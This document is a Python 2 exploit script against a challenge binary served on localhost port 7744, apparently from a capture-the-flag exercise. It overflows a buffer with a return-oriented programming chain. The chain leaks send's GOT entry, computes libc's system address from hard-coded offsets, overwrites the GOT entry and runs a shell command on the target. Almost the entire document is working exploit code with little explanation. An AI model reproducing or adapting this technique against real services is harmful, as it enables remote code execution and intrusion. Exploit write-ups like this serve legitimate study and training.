Reproduced on Ubuntu 13.10
```python
from socket import *
from struct import *
import time

s = socket(AF_INET, SOCK_STREAM)
s.connect(('localhost', 7744))

# Fixed addresses taken from the (non-PIE) challenge binary
leaveret = 0x8048a68
recv_plt = 0x8048770
send_plt = 0x8048790
bss = 0x804b080
fake_ebp = bss + 0x50
send_got = 0x804b070
ppppr = 0x804906c       # pop; pop; pop; pop; ret gadget

cmd = "id>&4\x00"

# Overflow filler, then the ROP chain
payload = "1;" + "\x00" * (0x66c + 4 - 2)
# send(4, send_got, 4, 0): leak the resolved address of send from the GOT
payload += pack('<L', send_plt)
payload += pack('<L', ppppr)
payload += pack('<L', 4)
payload += pack('<L', send_got)
payload += pack('<L', 4)
payload += pack('<L', 0)
# recv(4, send_got, 4, 0): overwrite send's GOT entry with the value sent back
payload += pack('<L', recv_plt)
payload += pack('<L', ppppr)
payload += pack('<L', 4)
payload += pack('<L', send_got)
payload += pack('<L', 4)
payload += pack('<L', 0)
# recv(4, bss, len(cmd), 0): place the command string in .bss
payload += pack('<L', recv_plt)
payload += pack('<L', ppppr)
payload += pack('<L', 4)
payload += pack('<L', bss)
payload += pack('<L', len(cmd))
payload += pack('<L', 0)
# Call through send@plt, which now points at system, with bss as the argument
payload += pack('<L', send_plt)
payload += "AAAA"
payload += pack('<L', bss)

time.sleep(0.5)
print s.recv(1024)
s.send("4\n")
time.sleep(0.5)
print s.recv(1024)
raw_input('go?')
s.send(";" * 0x38 + pack('<L', len(payload)))
time.sleep(1)
print s.recv(1024)
s.send(payload)
time.sleep(1)
#print s.recv(5)
#time.sleep(1)

# Read the leaked send address and compute system from the libc offsets
send_addr = unpack('<L', s.recv(4))[0]
system_addr = send_addr - 0xf3940 + 0x41260
print "System: " + hex(system_addr)
s.send(pack('<L', system_addr))
s.send(cmd)
time.sleep(0.1)
print s.recv(1024)
s.close()
```